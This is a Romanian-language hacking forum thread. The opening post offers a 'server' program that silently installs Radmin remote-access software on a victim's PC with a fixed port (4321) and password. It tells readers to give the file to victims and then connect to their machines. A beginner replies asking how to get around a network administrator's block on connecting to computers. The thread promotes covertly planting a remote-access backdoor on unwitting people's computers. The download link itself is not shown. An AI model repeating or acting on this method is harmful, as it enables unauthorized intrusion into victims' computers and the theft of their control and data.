Jump to content
Fatal1ty

o metoda veche dar....

Recommended Posts

o sa va arat o modalitate veche,insa de succes, folosita de mine pt a intra in PC altora ...radmin este prietenul vostru ...mai exact ghost radmin

am facut un server care odata rulat pe Pc victimei instaleaza silentios(adik fara sa avertizeze userul Pc-ului) radminul pe portul "4321", pass "xplicit"

voi trebuie sa dati serverul victimei apoi,dupa ce victima il ruleaza, va conectati la ea cu radmin-ul punand ip-ul ei, portul si pass-ul pe care l-am spus mai sus & BOOM!! "yeaaaaah baby ...i`m a hacker !!! i`m in!! i`m in that fkin Pc"

dak aveti nelamuriri in legatura cu ce am postat dati un reply

bafta all

serverul:

aici ;)

Link to comment
Share on other sites

Eu sunt incepator adik vreau sa invat hacking si am si eu o intrebare. Dak administratorul unei retele blocheaza optiunea de a ma putea conecta la un calculatoarele din retea cum as putea sa ma conectez mai simplu(asa k pt incepatori)? Am incercat cu comanda xxxxxxxxxxxx unde in loc de x pun un ip si nu-mi arata decat o fereastra cu o imprimanta. Comanda o bag in start-cmd.

Link to comment
Share on other sites

Poti sa o iei si k o cerere dar ce altceva as putea sa fac dak deabea invat nu am nici o cunostinta care sa merite sa o pun pe forum. Ce postari sa fac? Comentarii la ce posteaza ceilanti? Ma pasioneaza calculatoarele dar nu pot sa fac nimic cu el dak nu invat de la maestrii hackingului. Poate vei intelege Fatal1ty si poate vor intelege si ceilanti. Ce postari sa faca incepatorii care nu au o treaba cu hackingul inca? Candva sper sa ajung si eu un hacker macar la fel de bun ca voi. Dar pt asta trebuie sa pun intrebari.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...